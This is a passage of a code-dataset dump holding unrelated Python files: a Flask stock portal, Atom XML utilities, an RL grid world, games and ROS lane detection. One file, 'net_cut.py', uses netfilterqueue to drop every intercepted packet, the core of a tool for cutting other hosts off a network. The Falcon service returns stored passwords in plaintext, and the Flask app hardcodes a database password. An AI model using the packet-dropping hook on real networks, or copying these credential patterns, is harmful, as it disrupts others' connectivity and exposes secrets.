the /services/ url.\n \"\"\"\n def on_get(self, req, res, id):\n # Get the data\n try:\n payload = []\n service = Service.get(Service.id == id)\n\n # Get all the services and organize them\n services_dict = {}\n services_dict[\"url\"] = service.url\n services_dict[\"username\"] = service.username\n services_dict[\"password\"] = service.password\n payload.append(services_dict)\n\n res.status = falcon.HTTP_200\n res.body = json.dumps(payload)\n except Exception as e:\n print(e)\n error_msg = (\"Unable to get the items. Please try again later\")\n raise falcon.HTTPServiceUnavailable(title=\"{0} failed\".format(req.method),\n description=error_msg,\n retry_after=30,\n href=settings.__docs__)\n\n def on_post(self, req, res, id):\n pass\n\n def on_put(self, req, res, id):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(req.method),\n href=settings.__docs__)\n\n def on_update(self, req, res, id):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(req.method),\n href=settings.__docs__)\n\n def on_delete(self, req, res, id):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(req.method),\n href=settings.__docs__)\n\n\nclass Services(object):\n\n def on_get(self, req, res):\n \"\"\"\n Handle the GET request, returning a list of the items that the user\n has access to.\n\n First we create an empty dictionary and query the database to get\n all the item objects. After that, we iterate over the objects to\n populate the dictionary. In the end we return a 200 code to the browser\n and return the results dictionary wrapped in a list like the ReST\n standard says.\n \"\"\"\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(request.method),\n href=settings.__docs__)\n\n def on_post(self, request, response, pk):\n pass\n\n def on_put(self, request, response, pk):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(request.method),\n href=settings.__docs__)\n\n def on_update(self, request, response):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(request.method),\n href=settings.__docs__)\n\n def on_delete(self, request, response):\n raise falcon.HTTPError(falcon.HTTP_405,\n title=\"Client error\",\n description=\"{0} method not allowed.\".format(request.method),\n href=settings.__docs__)\n","sub_path":"sikre/resources/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":4423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"521742808","text":"try:\n from xml.etree.ElementTree import fromstring, tostring, SubElement\n import xml.etree.ElementTree as ElementTree\nexcept:\n from elementtree.ElementTree import fromstring, tostring, SubElement\n import elementtree.ElementTree as ElementTree\n\nclass namespace(object):\n def __init__(self, uri):\n self.ns_uri = uri\n self.memoized = {}\n\n def __call__(self, element):\n if element not in self.memoized:\n self.memoized[element] = \"{%s}%s\" % (self.ns_uri, element)\n return self.memoized[element]\n\n\nATOM = namespace(\"http://www.w3.org/2005/Atom\")\nAPP = namespace(\"http://www.w3.org/2007/app\")\nXHTML = namespace(\"http://www.w3.org/1999/xhtml\")\n\nmy_namespaces = {\n \"http://www.w3.org/1999/xhtml\": \"xhtml\",\n \"http://www.w3.org/2007/app\" : \"app\",\n \"http://www.w3.org/2005/Atom\" : \"atom\"\n }\n\nElementTree._namespace_map.update(my_namespaces)\n\nimport re\nfrom urlparse import urljoin\nfrom xml.sax.saxutils import quoteattr, escape\nimport time\nimport calendar\n\n\ndef get_element(etree, name):\n value = \"\"\n if '}' not in name:\n name = ATOM(name)\n l = etree.findall(name)\n if l:\n value = l[0].text\n return value\n\nRFC3339 = re.compile(\"^(?P\\d\\d\\d\\d)-(?P\\d\\d)-(?P\\d\\d)T(?P\\d\\d):(?P\\d\\d):(?P\\d\\d)(\\.\\d*)?\" +\n \"(?PZ|((?P[+-]\\d\\d):\\d\\d))$\") \n\ndef get_date(etree, name):\n \"\"\"\n Returns the Date Construct value as seconds from the epoch\n in UTC. The 'name' should be the element name of an\n RFC 4287 Date Contruct, such as ATOM('published'), ATOM('updated')\n or APP('edited'). The parameter 'etree' in an elementtree\n element. Note that you don't need to add the namespace\n to elements in the ATOM namespace.\n \"\"\"\n date = get_element(etree, name)\n m = RFC3339.search(date)\n if not m:\n raise ValueError(\"Not a valid RFC 3339 format.\")\n d = m.groupdict()\n ndate = [int(x) for x in [d['year'], d['month'], d['day'], d['hour'], d['minute'], d['second']]]\n ndate.append(0) # weekday\n ndate.append(1) # year day\n if d['timezone'] != 'Z':\n ndate[3] -= int(d['tzhour'])\n ndate.append(0)\n return calendar.timegm(tuple(ndate))\n \n\ndef serialize_nons(element, top):\n tag = element.tag.split(\"}\", 1)[1]\n tail = u\"\"\n if element.tail != None:\n tail = escape(element.tail)\n text = u\"\"\n if element.text != None:\n text = element.text\n attribs = \" \".join([\"%s=%s\" % (k, quoteattr(v)) for k, v in element.attrib.iteritems()])\n if attribs:\n attribs = \" \" + attribs\n if top:\n value = escape(text)\n close = u\"\"\n else:\n value = \"<%s%s>%s\" % (tag, attribs, escape(text))\n close = \"\" % tag\n if value == None:\n value = u\"\"\n \n return value + \"\".join([serialize_nons(c, False) for c in element.getchildren()]) + close + tail\n \n\ndef get_text(name, entry):\n value = \"\"\n texttype = \"text\"\n l = entry.findall(ATOM(name))\n if l:\n value = l[0].text\n texttype = mime2atom(l[0].get('type', 'text'))\n if texttype in [\"text\", \"html\"]:\n pass\n elif texttype == \"xhtml\":\n div = l[0].find(\"{http://www.w3.org/1999/xhtml}div\")\n value = serialize_nons(div, True)\n else:\n value = \"\"\n if value == None:\n value = \"\"\n return (texttype, value)\n\n\ndef set_text(entry, name, ttype, value):\n elements = entry.findall(ATOM(name))\n if not elements:\n element = SubElement(entry, ATOM(name))\n else:\n element = elements[0]\n element.set('type', ttype)\n [element.remove(e) for e in element.getchildren()]\n if ttype in [\"html\", \"text\"]:\n element.text = value\n elif ttype == \"xhtml\":\n element.text = \"\"\n try:\n div = fromstring((u\"
%s
\" % value).encode('utf-8'))\n element.append(div)\n except:\n element.text = value\n element.set('type', 'html')\n\n\nmime_to_atom = {\n \"application/xhtml+xml\": \"xhtml\",\n \"text/html\": \"html\",\n \"text/plain\": \"text\"\n }\n\ndef mime2atom(t):\n if t in mime_to_atom:\n return mime_to_atom[t]\n else:\n return t\n\ndef wrap(text, width):\n l = 0\n ret = []\n for s in text.split(' '):\n ret.append(s)\n l += len(s)\n nl = s.find('\\n') >= 0\n if l > width or nl:\n l = 0\n if not nl:\n ret.append('\\n')\n else:\n ret.append(' ')\n return \"\".join(ret)\n\n\n","sub_path":"build/lib.linux-x86_64-2.7/atompubbase/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"134980973","text":"from flask import Flask\nimport pymongo\nfrom pymongo import errors\nimport mysql.connector\nfrom mysql.connector import errorcode\nimport time\n\napp = Flask(__name__)\n\ndef checkmongodbconnection():\n try:\n c = pymongo.MongoClient(MONGO_URI)\n c.admin.command('ismaster')\n time.sleep(2)\n c.close()\n return True\n except pymongo.errors.ServerSelectionTimeoutError as e:\n print('Could not connect to server: %s',e)\n return False\n else:\n c.close()\n return False\n\n\n@app.route(\"/reset\")\ndef resetme():\n c = pymongo.MongoClient(\"mongodb://mongo1:27017,mongo2:27018,mongo3:27019/?replicaSet=rs0\")\n db = c.get_database(name='Stocks')\n mycol = db[\"StockData\"]\n mycol.delete_many({})\n return \"Database reset\"\n \n@app.route(\"/\")\ndef hello():\n global MYSQL_CONNECTIONSTRING\n global MONGO_URI\n\n MONGO_URI=\"mongodb://mongo1:27017,mongo2:27018,mongo3:27019/?replicaSet=rs0\"\n\n MYSQL_CONNECTIONSTRING = {\n 'user': \"mysqluser\",\n 'password': \"pass@word1\",\n 'host': 'mysqlstock',\n 'database': 'Stocks',\n 'raise_on_warnings': True,\n 'auth_plugin': 'mysql_native_password'\n }\n\n while True:\n print('Checking MongoDB Connection')\n if checkmongodbconnection()==False:\n print('Problem connecting to MongoDB, sleeping 10 seconds')\n time.sleep(10)\n else:\n break\n print('Successfully connected to MongoDB')\n\n try:\n c = pymongo.MongoClient(MONGO_URI)\n db = c.get_database(name='Stocks')\n mycol = db[\"StockData\"]\n stocks=mycol.aggregate([\n {\n '$group': {\n '_id': '$company_symbol', \n 'company_name': {\n '$first': '$company_name'\n }, \n 'price': {\n '$first': '$price'\n }, \n 'tx_time': {\n '$first': '$tx_time'\n }\n }\n }\n ])\n x=\"

Stock securities in MongoDB


\"\n for stock in stocks:\n x+=''\n x=x+'
' + stock[u'_id']+ '' + stock[u'company_name'] + '' + str(stock[u'price'])+ '' + str(stock[u'tx_time']) + '
'\n\n except Exception as e:\n print(\"mongo error: \" + str(e))\n \n cnx = mysql.connector.connect(**MYSQL_CONNECTIONSTRING)\n mycursor = cnx.cursor()\n\n mycursor.execute(\"SELECT DISTINCT c.company_symbol, (SELECT DISTINCT n.company_name from StockData n where n.company_symbol=c.company_symbol) as 'company_name', (SELECT MAX(p.price) from StockData p where p.company_symbol=c.company_symbol) as 'price', (SELECT MAX(t.tx_time) from StockData t where t.company_symbol=c.company_symbol) as 'tx_time' from StockData c LIMIT 10;\")\n\n myresult = mycursor.fetchall()\n\n x+=\"

Stock securities in MySQL


\"\n for stock in myresult:\n x+=''\n x=x+'
' + str(stock[0])+ '' + str(stock[1]) + '' + str(stock[2])+ '' + str(stock[3]) + '
'\n return x\n\nif __name__ == \"__main__\":\n # Only for debugging while developing\n app.run(host='0.0.0.0', debug=True, port=80)\n","sub_path":"stockportal/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"80149559","text":"#Rafael Guimaraes Pereira\n#23.8.2021\n#Este programa gera o arquivo de entrada para o Gnuplot\n#\n#Como usar:\n#\n# $python gera_plot > plot.p\n# gnuplot\n# load 'plot.p'\n\nstride=2000\nn_config = 100000\nat_por_config = 500\nfinal = int(n_config/stride)\ninicial=1 #int(final/2)\n\n\nprint('set xrange [0:50]; set yrange [0:4.5];')\n#print('set palette model RGB')\nprint('set palette defined ( 0 \\\"blue\\\", 3 \\\"green\\\", 5 \\\"red\\\")')\n\n#for i in range(1,(n_config*at_por_config),at_por_config):\nfor i in range(inicial,final):\n\n a = ((i * 500) * stride) + 1\n b = a - 500\n\n\t#print('p \\\"<(sed -n \\''+str(i*stride)+','+str(i*stride+500)+'p\\' out.xyz)\\\" u 2:1:3 palette; pause 0.1;')\n print('p \\\"<(sed -n \\''+str(b)+','+str(a)+'p\\' out.xyz)\\\" u 2:1:3 palette lt 7; pause 0.0;')\n\n#lt 7: bolinha fechada\n#lt 6: bolinha aberta","sub_path":"count-left-right/gera_plot.py","file_name":"gera_plot.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"505224499","text":"from optparse import OptionParser\nfrom pygr import *\n\nfrom pygr import worldbase\nimport pygr\nfrom pygr.seqdb import SequenceFileDB\n\nimport numpy as np\nfrom kitz_wssd.wssd_common import *\nfrom wssd_pw_common import *\n\n\ndef pad(masked,pad):\n masked_locs = arrayToNonZeroContigRanges(masked)\n contig_len = masked.shape[0]\n starts = masked_locs[:,0]-pad\n ends = masked_locs[:,1]+pad\n\n starts[np.where(starts<0)] = 0\n ends[np.where(ends>contig_len)] = contig_len\n if starts.shape[0]>0:\n flip_to_true = np.unique(np.concatenate([np.arange(aa,bb) for (aa,bb) in zip(starts,ends)]))\n masked[flip_to_true] = 1\n\n return masked\n\nif __name__==\"__main__\":\n opts = OptionParser()\n opts.add_option('','--input_fa',dest='fn_fa',default=None)\n opts.add_option('','--input_RM_fa',dest='fn_RM_fa',default=None)\n opts.add_option('','--input_TRF_fa',dest='fn_TRF_fa',default=None)\n opts.add_option('','--fn_mask_out',dest='fn_mask_out',default=None)\n opts.add_option('','--contigs',dest='fn_contigs',default=None)\n opts.add_option('','--pad',dest='pad',default=30,type=int)\n opts.add_option('','--old_to_new_contigs',dest='old_to_new_contigs')\n opts.add_option('','--limit_to_contigs',dest='fn_limit_to_contigs',default=None)\n opts.add_option('','--exclude_TRF_from',dest='fn_exclude_TRF_from',default=None)\n\n (o,args) = opts.parse_args()\n #####RIGHT NOW THIS ONLY ACCEPTS FASTAS ->BUT< could take coords too\n\n #######NOTE< kindof a cop-out, i'm just setting the one track (out of 3) to be the whole mask... ignoring the different\n #######levels for RM, TRF, etc. could change later \n #old_to_new_contigs = o.old_to_new_contigs!= None and dict([tuple([l.rstrip().split()[0],l.rstrip().split()[1]]) for l in open(o.old_to_new_contigs,'r').readlines()]) or None\n\n limit_to_contigs = None; \n if o.fn_limit_to_contigs != None: \n limit_to_contigs = [line.rstrip() for line in open(o.fn_limit_to_contigs).readlines() ]\n \n exclude_TRF_from = None; \n if o.fn_exclude_TRF_from != None: \n exclude_TRF_from = [line.rstrip() for line in open(o.fn_exclude_TRF_from).readlines() ]\n\n input_fa = SequenceFileDB(o.fn_fa)\n input_fa_RM = SequenceFileDB(o.fn_RM_fa)\n input_fa_TRF = SequenceFileDB(o.fn_TRF_fa)\n\n mask_track = DenseTrackSet(\n o.fn_contigs,\n o.fn_mask_out,\n True,\n 'w',\n compression=True )\n\n\n ###only one group, called, mask\n grp = \"mask\"\n mask_track.addGroup( grp ) \n mask_track[grp].addArray( tables.BoolAtom(), [3] ) \n\n for contig in input_fa:\n print(contig)\n contig = contig.replace(\".\",\"_\")\n #fa_contig=old_to_new_contigs!=None and old_to_new_contigs[contig] or contig\n char_fa_RM = np.array(str(input_fa_RM[contig]),'c')\n char_fa_TRF = np.array(str(input_fa_TRF[contig]),'c')\n print(char_fa_RM[0:100])\n print(char_fa_TRF[0:100])\n\n if limit_to_contigs == None or contig in limit_to_contigs:\n if exclude_TRF_from !=None and contig in exclude_TRF_from:\n masked = (char_fa_RM==\"N\")\n else:\n masked = (char_fa_RM==\"N\")|(char_fa_TRF==\"N\")\n\n masked = pad(masked,o.pad)\n else:\n print(\"IGNORING CURRENT CONTIG\", contig)\n masked = (char_fa_RM==\"?\")|(char_fa_TRF==\"?\") ###SHOULD EVALUATE TO ALL FALSES!\n \n print(masked[0:100])\n\n ###here, really should be putting the RM in 0, and the TRF in 1... or, other way around, can't remember :)\n mask_track['mask'][contig][:,0] = masked \n\n","sub_path":"ref_prep/scripts/make_padded_mask_from_multiple_Nd_fastas.py","file_name":"make_padded_mask_from_multiple_Nd_fastas.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"220447820","text":"from __future__ import division\nimport numpy as np\nfrom copy import deepcopy\nfrom collections import defaultdict\nimport itertools\nfrom numpy.linalg import norm\nimport gym\nfrom gym.envs.toy_text import discrete\nimport sys\nfrom scipy.spatial.distance import euclidean\n\nUP = 0\nRIGHT = 1\nDOWN = 2\nLEFT = 3\nNONE = 4\n\nclass CurrentWorld(discrete.DiscreteEnv):\n\n metadata = {'render.modes': ['human', 'ansi']}\n\n def _limit_coordinates(self, coord):\n coord[0] = min(coord[0], self.shape[0] - 1)\n coord[0] = max(coord[0], 0)\n coord[1] = min(coord[1], self.shape[1] - 1)\n coord[1] = max(coord[1], 0)\n return coord\n\n def _calculate_transition_prob(self, current, delta, winds):\n new_position = np.array(current) + np.array(delta) + np.multiply(1, self.winds_convert_dict[winds[tuple(current)]])\n new_position = self._limit_coordinates(new_position).astype(int)\n new_state = np.ravel_multi_index(tuple(new_position), self.shape)\n is_done = tuple(new_position) == self.terminal_state\n if is_done:\n return [(1.0, new_state, 0, is_done)]\n# if delta == [0,0]:\n# return [(1.0, new_state, -1, is_done)]\n return [(1.0, new_state, -1, is_done)]\n# if is_done:\n# return [(1.0, new_state, 10000000, is_done)]\n# if delta == [0,0]:\n# return [(1.0, new_state, -euclidean(np.unravel_index(new_state,self.shape),self.terminal_state), is_done)]\n# return [(1.0, new_state, -100*euclidean(np.unravel_index(new_state,self.shape),self.terminal_state), is_done)]\n\n\n\n def __init__(self):\n self.shape = (20, 20)\n\n nS = np.prod(self.shape)\n nA = 5\n\n # Wind strength\n winds = np.zeros(self.shape)\n# winds = add_square_current((10,10),5,self.shape)\n# winds += add_square_current((10,10),4,self.shape)\n# winds += add_square_current((10,10),3,self.shape)\n# winds += add_square_current((10,10),2,self.shape)\n \n# for i in range(1,6):\n# winds += add_square_current((30,30),i,self.shape)\n self.winds = winds\n self.winds_convert_dict = {0:[0,0],1:[0,1],2:[1,0],3:[0,-1],4:[-1,0]}\n self.start_state = (12,5)\n self.terminal_state = (15,18)\n # Calculate transition probabilities\n P = {}\n for s in range(nS):\n position = np.unravel_index(s, self.shape)\n P[s] = { a : [] for a in range(nA) }\n P[s][UP] = self._calculate_transition_prob(position, [-1, 0], winds)\n P[s][RIGHT] = self._calculate_transition_prob(position, [0, 1], winds)\n P[s][DOWN] = self._calculate_transition_prob(position, [1, 0], winds)\n P[s][LEFT] = self._calculate_transition_prob(position, [0, -1], winds)\n P[s][NONE] = self._calculate_transition_prob(position, [0, 0], winds)\n\n# Set start point\n isd = np.zeros(nS)\n isd[np.ravel_multi_index(self.start_state, self.shape)] = 1.0\n\n super(CurrentWorld, self).__init__(nS, nA, P, isd)\n \n def show_img(self):\n world = deepcopy(self.winds)\n world[np.unravel_index(self.s,self.shape)] = 7\n plt.imshow(world)\n\n\ndef limit_coordinates(coord,world):\n coord[0] = min(coord[0], np.shape(world)[0] - 1)\n coord[0] = max(coord[0], 0)\n coord[1] = min(coord[1], np.shape(world)[1] - 1)\n coord[1] = max(coord[1], 0)\n return coord\n\ndef add_square_current(center,radius,world_shape,direction='cw'):\n world = np.zeros(world_shape)\n vertical_boundary = [center[0]-radius, center[0]+radius]\n vertical_boundary = limit_coordinates(vertical_boundary,world)\n horizontal_boundary = [center[1]-radius, center[1]+radius]\n horizontal_boundary = limit_coordinates(horizontal_boundary,world)\n vertical_index = np.linspace(vertical_boundary[0],vertical_boundary[1],vertical_boundary[1]+1-vertical_boundary[0])\n horizontal_index = np.linspace(horizontal_boundary[0],horizontal_boundary[1],horizontal_boundary[1]+1-horizontal_boundary[0])\n xx, yy = np.meshgrid(vertical_index,horizontal_index)\n x_range = np.array([np.amin(xx),np.amax(xx)]).astype(int)\n y_range = np.array([np.amin(yy),np.amax(yy)]).astype(int)\n xxyy = zip(xx,yy)\n coord = []\n for i,j in xxyy:\n coord += zip(i,j)\n coord = np.array([np.array(i).astype(int) for i in coord])\n boundary_index = []\n for i,j in coord:\n if i in x_range or j in y_range:\n boundary_index += [[i,j]]\n# 1:right, 2:down, 3:left, 4:up, 0:no current\n if direction == 'cw':\n world[y_range[0]:y_range[1]+1,x_range[0]] = 4\n world[y_range[0]:y_range[1],x_range[1]] = 2\n world[y_range[0],x_range[0]:x_range[1]] = 1\n world[y_range[1],x_range[0]+1:x_range[1]+1] = 3\n elif direction == 'ccw':\n world[y_range[0]:y_range[1]+1,x_range[0]] = 2\n world[y_range[0]:y_range[1],x_range[1]] = 4\n world[y_range[0],x_range[0]:x_range[1]] = 3\n world[y_range[1],x_range[0]+1:x_range[1]+1] = 1\n else:\n raise AttributeError(\"Direction input is not correct, please use 'cw' or 'ccw'\")\n return world\n","sub_path":"DDQN/env_current.py","file_name":"env_current.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"577792785","text":"#!/usr/bin/env python\n\nimport netfilterqueue\nimport scapy as scapy\n\n\ndef process_packet(packet):\n scapy_packet= scapy.IP(packet.get_payload())\n print(scapy_packet.show())\n packet.drop()\n\n\nqueue = netfilterqueue.NetfilterQueue()\nqueue.bind(0, process_packet)\nqueue.run()\n","sub_path":"net_cut/net_cut.py","file_name":"net_cut.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582862379","text":"import pygame\nimport time\n\nmap = [\n \" XXXXX \",\n \" X XXXX\",\n \" X X X\",\n \" XX tX\",\n \"XXX XXXtX\",\n \"X b X XtX\",\n \"X bbX XXX\",\n \"Xa X \",\n \"XXXXX \",\n]\n\nmap_dict = {\n \" \": pygame.image.load(\"floor.png\"),\n \"X\": pygame.image.load(\"wall.png\"),\n \"b\": pygame.image.load(\"box.png\"),\n \"B\": pygame.image.load(\"box_on_target.png\"),\n \"a\": pygame.image.load(\"player.png\"),\n \"A\": pygame.image.load(\"player_on_target.png\"),\n \"t\": pygame.image.load(\"box_target.png\")\n}\n\n\n\npygame.init() # Prepare the PyGame module for use\nmain_surface = pygame.display.set_mode((16*len(map[0]), 16*len(map)))\n\n\nwhile True:\n\n # Look for an event from keyboard, mouse, joystick, etc.\n ev = pygame.event.poll()\n if ev.type == pygame.QUIT: # Window close button clicked?\n break # Leave game loop\n\n\n # Completely redraw the surface, starting with background\n main_surface.fill((255, 255, 255))\n\n for i in range(len(map)):\n for j in range(len(map[i])):\n # Copy our image to the surface, at this (x,y) posn\n main_surface.blit(map_dict[map[i][j]], (j*16, i*16))\n\n # Now that everything is drawn, put it on display!\n pygame.display.flip()\n\npygame.quit()\n\n","sub_path":"sokoban_pygame/pygame_playground.py","file_name":"pygame_playground.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"469216226","text":"__author__ = 'Dawid'\n\n# do punktu (x,y) moża dojść z punktów {...} z danym kosztem.\ncosts = {\n '(1,0)': {\n '(0,0)': 4\n },\n '(2,0)': {\n '(1,0)': 1\n },\n '(3,0)': {\n '(2,0)': 2\n },\n '(4,0)': {\n '(3,0)': 3\n },\n '(0,1)': {\n '(0,0)': 6\n },\n '(1,1)': {\n '(1,0)': 4,\n '(0,1)': 3\n },\n '(2,1)': {\n '(2,0)': 3,\n '(1,1)': 2\n },\n '(3,1)': {\n '(3,0)': 3,\n '(2,1)': 2\n },\n '(4,1)': {\n '(4,0)': 2,\n '(3,1)': 2\n },\n '(0,2)': {\n '(0,1)': 10\n },\n '(1,2)': {\n '(1,1)': 4,\n '(0,2)': 2\n },\n '(2,2)': {\n '(2,1)': 2,\n '(1,2)': 3\n },\n '(3,2)': {\n '(3,1)': 3,\n '(2,2)': 2\n },\n '(4,2)': {\n '(4,1)': 2,\n '(3,2)': 1\n },\n '(0,3)': {\n '(0,2)': 20\n },\n '(1,3)': {\n '(1,2)': 8,\n '(0,3)': 1\n },\n '(2,3)': {\n '(2,2)': 3,\n '(1,3)': 2\n },\n '(3,3)': {\n '(3,2)': 2,\n '(2,3)': 2\n },\n '(4,3)': {\n '(4,2)': 3,\n '(3,3)': 2\n },\n '(0,4)': {\n '(0,3)': 25\n },\n '(1,4)': {\n '(1,3)': 10,\n '(0,4)': 3\n },\n '(2,4)': {\n '(2,3)': 4,\n '(1,4)': 3\n },\n '(3,4)': {\n '(3,3)': 3,\n '(2,4)': 3\n },\n '(4,4)': {\n '(4,3)': 2,\n '(3,4)': 2\n }\n}\n\npaths = {\n '(0,0)': {\n '(0,0)': 0\n }\n}\n\ngrid_size = 5\n\n\ndef generate_paths(destination):\n global paths\n global costs\n global grid_size\n\n for i in range(0, grid_size):\n for j in range(0, grid_size):\n point = '({0},{1})'.format(j, i)\n\n if point != '(0,0)':\n ways = costs[point]\n\n print('@point:', point, ':', ways)\n\n for p in ways:\n print('way:', p)\n\n if p in paths:\n print('Droga do', p, 'jest w wygenerowanych scizkach')\n\n paths_temp = {}\n\n for path in paths:\n\n if path in paths[p]:\n cost = paths[p][path]\n print('sciezka', path, 'ma koszt', cost)\n\n new_path = path + point\n new_path_cost = cost + ways[p]\n print('new path:', new_path, 'cost:', new_path_cost)\n\n # Moze byc koniecznie sprawdzenei istniejących wartości ściezek, zeby wybrac optymalna\n paths_temp[new_path] = new_path_cost\n\n for tmp in paths_temp:\n if point not in paths:\n paths[point] = {tmp: paths_temp[tmp]}\n else:\n paths[point][tmp] = paths_temp[tmp]\n\n print('paths new:', paths)\n\n else:\n print('Drogi do', p, 'nie ma w wygenerowanych scizkach. Pobieram je z tabeli kosztów.')\n print('costs[{0}]: {1}'.format(p, costs[p]))\n\n for prv in costs[p]:\n if prv in paths:\n prv_paths = paths[prv]\n\n best_path = min(prv_paths, key=prv_paths.get)\n cost = paths[prv][best_path]\n new_cost = cost + costs[p][prv]\n new_path = best_path + p\n print('New path:', new_path)\n\n if p not in paths:\n paths[p] = {new_path: new_cost}\n else:\n paths[p][new_path] = new_cost\n\n else:\n print('Punktu', prv, 'nie ma w paths. Trzeba go dodac')\n\n final_point = '({0},{1})'.format(grid_size-1, grid_size-1)\n if point == final_point:\n for prv in costs[final_point]:\n if prv in paths:\n prv_paths = paths[prv]\n best_path = min(prv_paths, key=prv_paths.get)\n cost = paths[prv][best_path]\n new_cost = cost + costs[final_point][prv]\n new_path = best_path + final_point\n\n if final_point not in paths:\n paths[final_point] = {new_path: new_cost}\n else:\n paths[final_point][new_path] = new_cost\n else:\n print('Punktu', final_point, 'nie ma w paths. MAMY PROBLEM!!!!!!!!!!!!!!!!!!!!')\n print('\\n')\n\n print('\\nFinal paths:')\n\n c = 1\n for s in paths:\n print('{0}.\\t{1}: {2}'.format(c, s, paths[s]))\n c += 1\n\n solutions = paths[destination]\n if len(solutions) > 0:\n best_solution = min(solutions, key=solutions.get)\n return '{0} : {1}'.format(best_solution, solutions[best_solution])\n else:\n return None\n\n\ndef main():\n destination = '(4,4)'\n solution = generate_paths(destination)\n\n print('\\n=========================================')\n print('Best way:')\n print(solution)\n\n\nif __name__ == '__main__':\n main()","sub_path":"zad1_grid/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"531346789","text":"# ch12_22.py\nfrom tkinter import *\n\n\nroot = Tk()\nroot.title(\"ch12_22\") # 視窗標題\n\nscrollbar = Scrollbar(root) # 建立捲軸\nscrollbar.pack(side=RIGHT, fill=Y)\n\n# 建立Listbox, yscrollcommand指向scrollbar.set方法\nlb = Listbox(root, yscrollcommand=scrollbar.set)\nfor i in range(50): # 建立50筆項目\n lb.insert(END, \"Line \" + str(i))\nlb.pack(side=LEFT,fill=BOTH,expand=True)\n\nscrollbar.config(command=lb.yview)\n\nroot.mainloop()\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"_4.python/__code/Python GUI 設計活用 tkinter之路/ch12/ch12_22.py","file_name":"ch12_22.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"610920328","text":"#!/usr/bin/env python\n\n\n\nimport rospy\nimport cv2\nimport numpy as np\nimport math\nimport time\nfrom std_msgs.msg import String\nfrom std_msgs.msg import Float64\nfrom geometry_msgs.msg import Point\nfrom std_msgs.msg import Bool\nfrom sensor_msgs.msg import Image\nfrom sensor_msgs.msg import CompressedImage\nfrom matplotlib import pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom cv_bridge import CvBridge, CvBridgeError\nimport sys\n\n'''\n#--------------------------------------------------------------------------------------\n# definition des variable\n#-------------------------------------------------------------------------------------\n\nymin = 80\nymax =81\nxmin1=0\nxmax1=90\nxmin2=230\nxmax2=320\n#previous_line_parameters = 0,0\n'''\n#-------------------------------------------------houghlines---------------------------------------\n\n\nthetaf=[]\nTime= time.time()\n\n\n\n\n\nrho = 2\ntheta=1*np.pi/180\nthreshold = 55\nmin_line_length = 30\nmax_line_gap = 20\n\n#--------------------------------------------------------------------------------------------------\n\n#--------------------------------------------region of interest -----------------------------------\n\n\ntrap_bottom_width = 1\ntrap_top_width = 0.9\ntrap_height = 0.4\n\n\n#--------------------------------------------------------------------------------------------------\n#lane_lines = []\nx = False ; \nbridge=CvBridge() ; \nang_cl = Point()\nang_cl.x=0.0\nang_cl.y=0.0\nang_cl.z=0.0\ns1_old = None\nx_offset_old = 1.0\nY_offset_old = 1.0\ns1_time = 0.0\npub = None\npub1 = None\npub2 = None\n\n#-----------------------------------------------filtre alpha beta---------------------------------------------\nalpha = 0.75\nbeta = 0.001\nprediction = 0.0\nestimate = 0.0\nsample_time = 0.033\nrate = 1\n\n\n\n\n#--------------------------------------------------------------------------------------------------\n\n\n#----------------------------------------------------------------------------------------\n# definition des foncitons\n#--------------------------------------------------------------------------------------\n\n\n\n\n\n\n##partie inspiré de Tian, D. (2019).Deeppicar — part 4 : Autonomous lane navigation via opencv.Consult ́e surhttps://towardsdatascience.com/deeppicar-part-4-lane-following-via-opencv-737dd9e47c96\n\ndef give_angle(image, average_line):\n global x\n global s1_time \n global x_offset_old\n global Y_offset_old\n global prediction\n global rate\n global estimate \n global sample_time\n global alpha\n global beta\n\n error_manager = Bool()\n height = image.shape[0]\n width = image.shape[1]\n\n if len(average_line) ==1 :\n x1, _, x2, _ = average_line[0]\n x_offset = x2-x1\n y_offset = int(height/2)\n x_offset_old =x_offset\n Y_offset_old = y_offset\n elif len(average_line) ==2 : \n _, _, left_x2, _= average_line[0]\n _, _, right_x2, _= average_line[1]\n mid = int(width/2)\n x_offset = (left_x2+right_x2)/2 - mid\n y_offset = int(height/2)\n x_offset_old =x_offset\n Y_offset_old = y_offset\n #----------------------------------------------------------------------------------------------------------------------------\n if len(average_line) == 0 and x == False:\n \n s1_time= time.time()\n x= True \n elif len(average_line) != 0 :\n s1_time = 0.0\n x = False ; \n \n\n global t1\n t1 =time.time()-s1_time\n \n if t1 < 2 and len(average_line) == 0 :\n x_offset = Y_offset_old\n y_offset = Y_offset_old\n 